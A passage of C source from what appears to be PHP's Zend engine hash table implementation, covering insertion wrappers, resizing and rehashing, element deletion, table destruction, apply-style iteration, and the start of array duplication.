{
return _zend_hash_index_add_or_update_i(ht, h, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_new(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_ADD | HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_update(HashTable *ht, zend_ulong h, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, h, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_next_index_insert_new(HashTable *ht, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_index_add_or_update_i(ht, ht->nNextFreeElement, pData, HASH_ADD | HASH_ADD_NEW | HASH_ADD_NEXT ZEND_FILE_LINE_RELAY_CC);
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed > ht->nNumOfElements + (ht->nNumOfElements >> 5)) { /* additional term is there to amortize the cost of compaction */
HANDLE_BLOCK_INTERRUPTIONS();
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else if (ht->nTableSize < HT_MAX_SIZE) { /* Let's double the table size */
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
uint32_t nSize = ht->nTableSize + ht->nTableSize;
Bucket *old_buckets = ht->arData;
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
} else {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket) + sizeof(uint32_t), sizeof(Bucket));
}
}
ZEND_API int ZEND_FASTCALL zend_hash_rehash(HashTable *ht)
{
Bucket *p;
uint32_t nIndex, i;
IS_CONSISTENT(ht);
if (UNEXPECTED(ht->nNumOfElements == 0)) {
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
ht->nNumUsed = 0;
HT_HASH_RESET(ht);
}
return SUCCESS;
}
HT_HASH_RESET(ht);
i = 0;
p = ht->arData;
if (ht->nNumUsed == ht->nNumOfElements) {
do {
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
} else {
do {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) {
uint32_t j = i;
Bucket *q = p;
if (EXPECTED(ht->u.v.nIteratorsCount == 0)) {
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
q++;
j++;
}
}
} else {
uint32_t iter_pos = zend_hash_iterators_lower_pos(ht, 0);
while (++i < ht->nNumUsed) {
p++;
if (EXPECTED(Z_TYPE_INFO(p->val) != IS_UNDEF)) {
ZVAL_COPY_VALUE(&q->val, &p->val);
q->h = p->h;
nIndex = q->h | ht->nTableMask;
q->key = p->key;
Z_NEXT(q->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(j);
if (UNEXPECTED(ht->nInternalPointer == i)) {
ht->nInternalPointer = j;
}
if (UNEXPECTED(i == iter_pos)) {
zend_hash_iterators_update(ht, i, j);
iter_pos = zend_hash_iterators_lower_pos(ht, iter_pos + 1);
}
q++;
j++;
}
}
}
ht->nNumUsed = j;
break;
}
nIndex = p->h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(i);
p++;
} while (++i < ht->nNumUsed);
}
return SUCCESS;
}
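/*
* zend_hash_rehash() rebuilds every collision chain from scratch and, when
* the bucket array contains IS_UNDEF holes, compacts the live buckets to
* the front. The two inner loops differ only in whether active external
* iterators have to be repositioned (zend_hash_iterators_update) as buckets
* move; nInternalPointer is adjusted in both cases.
*/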
static zend_always_inline void _zend_hash_del_el_ex(HashTable *ht, uint32_t idx, Bucket *p, Bucket *prev)
{
HANDLE_BLOCK_INTERRUPTIONS();
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
if (prev) {
Z_NEXT(prev->val) = Z_NEXT(p->val);
} else {
HT_HASH(ht, p->h | ht->nTableMask) = Z_NEXT(p->val);
}
}
if (HT_IDX_TO_HASH(ht->nNumUsed - 1) == idx) {
do {
ht->nNumUsed--;
} while (ht->nNumUsed > 0 && (UNEXPECTED(Z_TYPE(ht->arData[ht->nNumUsed-1].val) == IS_UNDEF)));
}
ht->nNumOfElements--;
if (HT_IDX_TO_HASH(ht->nInternalPointer) == idx || UNEXPECTED(ht->u.v.nIteratorsCount)) {
uint32_t new_idx;
new_idx = idx = HT_HASH_TO_IDX(idx);
while (1) {
new_idx++;
if (new_idx >= ht->nNumUsed) {
new_idx = HT_INVALID_IDX;
break;
} else if (Z_TYPE(ht->arData[new_idx].val) != IS_UNDEF) {
break;
}
}
if (ht->nInternalPointer == idx) {
ht->nInternalPointer = new_idx;
}
zend_hash_iterators_update(ht, idx, new_idx);
}
if (p->key) {
zend_string_release(p->key);
}
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, &p->val);
ZVAL_UNDEF(&p->val);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(&p->val);
}
HANDLE_UNBLOCK_INTERRUPTIONS();
}
static zend_always_inline void _zend_hash_del_el(HashTable *ht, uint32_t idx, Bucket *p)
{
Bucket *prev = NULL;
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
uint32_t nIndex = p->h | ht->nTableMask;
uint32_t i = HT_HASH(ht, nIndex);
if (i != idx) {
prev = HT_HASH_TO_BUCKET(ht, i);
while (Z_NEXT(prev->val) != idx) {
i = Z_NEXT(prev->val);
prev = HT_HASH_TO_BUCKET(ht, i);
}
}
}
_zend_hash_del_el_ex(ht, idx, p, prev);
}
ZEND_API void ZEND_FASTCALL zend_hash_del_bucket(HashTable *ht, Bucket *p)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
_zend_hash_del_el(ht, HT_IDX_TO_HASH(p - ht->arData), p);
}
ZEND_API int ZEND_FASTCALL zend_hash_del(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_del_ind(HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_string_hash_val(key);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->key == key) ||
(p->h == h &&
p->key &&
ZSTR_LEN(p->key) == ZSTR_LEN(key) &&
memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
zval tmp;
ZVAL_COPY_VALUE(&tmp, data);
ZVAL_UNDEF(data);
ht->pDestructor(&tmp);
} else {
ZVAL_UNDEF(data);
}
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del_ind(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
if (Z_TYPE(p->val) == IS_INDIRECT) {
zval *data = Z_INDIRECT(p->val);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
return FAILURE;
} else {
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_UNDEF(data);
ht->u.v.flags |= HASH_FLAG_HAS_EMPTY_IND;
}
} else {
_zend_hash_del_el_ex(ht, idx, p, prev);
}
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_str_del(HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
h = zend_inline_hash_func(str, len);
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API int ZEND_FASTCALL zend_hash_index_del(HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
Bucket *prev = NULL;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
_zend_hash_del_el_ex(ht, HT_IDX_TO_HASH(h), p, NULL);
return SUCCESS;
}
}
return FAILURE;
}
nIndex = h | ht->nTableMask;
idx = HT_HASH(ht, nIndex);
while (idx != HT_INVALID_IDX) {
p = HT_HASH_TO_BUCKET(ht, idx);
if ((p->h == h) && (p->key == NULL)) {
_zend_hash_del_el_ex(ht, idx, p, prev);
return SUCCESS;
}
prev = p;
idx = Z_NEXT(p->val);
}
return FAILURE;
}
ZEND_API void ZEND_FASTCALL zend_hash_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
SET_INCONSISTENT(HT_DESTROYED);
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
zend_hash_iterators_remove(ht);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
return;
}
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
ZEND_API void ZEND_FASTCALL zend_array_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
/* break possible cycles */
GC_REMOVE_FROM_BUFFER(ht);
GC_TYPE_INFO(ht) = IS_NULL | (GC_WHITE << 16);
if (ht->nNumUsed) {
/* In some rare cases destructors of regular arrays may be changed */
if (UNEXPECTED(ht->pDestructor != ZVAL_PTR_DTOR)) {
zend_hash_destroy(ht);
goto free_ht;
}
p = ht->arData;
end = p + ht->nNumUsed;
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
zend_hash_iterators_remove(ht);
SET_INCONSISTENT(HT_DESTROYED);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
goto free_ht;
}
efree(HT_GET_DATA_ADDR(ht));
free_ht:
FREE_HASHTABLE(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
}
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
HT_HASH_RESET(ht);
}
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_symtable_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->u.flags & HASH_FLAG_STATIC_KEYS) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
HT_HASH_RESET(ht);
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
p = ht->arData;
for (idx = 0; idx < ht->nNumUsed; idx++, p++) {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_reverse_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
p = ht->arData + ht->nNumUsed;
while (idx > 0) {
idx--;
p--;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
/* This is used to iterate over the elements of a hashtable and selectively
* delete certain entries. apply_func() receives the data and decides whether
* the entry should be deleted or the iteration should be stopped. The
* following three return codes are possible:
* ZEND_HASH_APPLY_KEEP - continue
* ZEND_HASH_APPLY_STOP - stop iteration
* ZEND_HASH_APPLY_REMOVE - delete the element, combinable with the former
*/
ZEND_API void ZEND_FASTCALL zend_hash_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
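/*
* A hypothetical apply_func_t callback, to illustrate the return codes
* documented above (the helper name is made up):
*
*   static int drop_null_entries(zval *val)
*   {
*       return (Z_TYPE_P(val) == IS_NULL)
*           ? ZEND_HASH_APPLY_REMOVE
*           : ZEND_HASH_APPLY_KEEP;
*   }
*
*   zend_hash_apply(ht, drop_null_entries);
*
* Returning ZEND_HASH_APPLY_REMOVE | ZEND_HASH_APPLY_STOP would delete the
* current entry and then stop the iteration.
*/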
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_argument(HashTable *ht, apply_func_arg_t apply_func, void *argument)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val, argument);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_arguments(HashTable *ht, apply_func_args_t apply_func, int num_args, ...)
{
uint32_t idx;
Bucket *p;
va_list args;
zend_hash_key hash_key;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
va_start(args, num_args);
hash_key.h = p->h;
hash_key.key = p->key;
result = apply_func(&p->val, num_args, args, &hash_key);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
va_end(args);
break;
}
va_end(args);
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_reverse_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_copy(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor)
{
uint32_t idx;
Bucket *p;
zval *new_entry, *data;
zend_bool setTargetPointer;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
setTargetPointer = (target->nInternalPointer == HT_INVALID_IDX);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (setTargetPointer && source->nInternalPointer == idx) {
target->nInternalPointer = HT_INVALID_IDX;
}
/* INDIRECT element may point to UNDEF-ined slots */
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
continue;
}
}
if (p->key) {
new_entry = zend_hash_update(target, p->key, data);
} else {
new_entry = zend_hash_index_update(target, p->h, data);
}
if (pCopyConstructor) {
pCopyConstructor(new_entry);
}
}
if (target->nInternalPointer == HT_INVALID_IDX && target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_always_inline int zend_array_dup_element(HashTable *source, HashTable *target, uint32_t idx, Bucket *p, Bucket *q, int packed, int static_keys, int with_holes)
{
zval *data = &p->val;
if (with_holes) {
if (!packed && Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
} else if (!packed) {
/* INDIRECT element may point to UNDEF-ined slots */
if (Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
}
}
do {
if (Z_OPT_REFCOUNTED_P(data)) {
if (Z_ISREF_P(data) && Z_REFCOUNT_P(data) == 1 &&
(Z_TYPE_P(Z_REFVAL_P(data)) != IS_ARRAY ||
Z_ARRVAL_P(Z_REFVAL_P(data)) != source)) {
data = Z_REFVAL_P(data);
if (!Z_OPT_REFCOUNTED_P(data)) {
break;
}
}
Z_ADDREF_P(data);
}
} while (0);
ZVAL_COPY_VALUE(&q->val, data);
q->h = p->h;
if (packed) {
q->key = NULL;
} else {
uint32_t nIndex;
q->key = p->key;
if (!static_keys && q->key) {
zend_string_addref(q->key);
}
nIndex = q->h | target->nTableMask;
Z_NEXT(q->val) = HT_HASH(target, nIndex);
HT_HASH(target, nIndex) = HT_IDX_TO_HASH(idx);
}
return 1;
}
static zend_always_inline void zend_array_dup_packed_elements(HashTable *source, HashTable *target, int with_holes)
{
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, 0, p, q, 1, 1, with_holes)) {
if (with_holes) {
ZVAL_UNDEF(&q->val);
}
}
p++; q++;
} while (p != end);
}
static zend_always_inline uint32_t zend_array_dup_elements(HashTable *source, HashTable *target, int static_keys, int with_holes)
{
uint32_t idx = 0;
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, idx, p, q, 0, static_keys, with_holes)) {
uint32_t target_idx = idx;
idx++; p++;
while (p != end) {
if (zend_array_dup_element(source, target, target_idx, p, q, 0, static_keys, with_holes)) {
if (source->nInternalPointer == idx) {
target->nInternalPointer = target_idx;
}
target_idx++; q++;
}
idx++; p++;
}
return target_idx;
}
idx++; p++; q++;
} while (p != end);
return idx;
}
ZEND_API HashTable* ZEND_FASTCALL zend_array_dup(HashTable *source)
{
uint32_t idx;
HashTable *target;
IS_CONSISTENT(source);
ALLOC_HASHTABLE(target);
GC_REFCOUNT(target) = 1;
GC_TYPE_INFO(target) = IS_ARRAY;
target->nTableSize = source->nTableSize;
target->pDestructor = source->pDestructor;
if (source->nNumUsed == 0) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_INITIALIZED|HASH_FLAG_PACKED|HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
target->nTableMask = HT_MIN_MASK;
target->nNumUsed = 0;
target->nNumOfElements = 0;
target->nNextFreeElement = 0;
target->nInternalPointer = HT_INVALID_IDX;
HT_SET_DATA_ADDR(target, &uninitialized_bucket);
} else if (GC_FLAGS(source) & IS_ARRAY_IMMUTABLE) {
target->u.flags = (source->u.flags & ~HASH_FLAG_PERSISTENT) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
memcpy(HT_GET_DATA_ADDR(target), HT_GET_DATA_ADDR(source), HT_USED_SIZE(source));
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else if (source->u.flags & HASH_FLAG_PACKED) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
HT_HASH_RESET_PACKED(target);
if (target->nNumUsed == target->nNumOfElements) {
zend_array_dup_packed_elements(source, target, 0);
} else {
zend_array_dup_packed_elements(source, target, 1);
}
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNextFreeElement = source->nNextFreeElement;
target->nInternalPointer = source->nInternalPointer;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
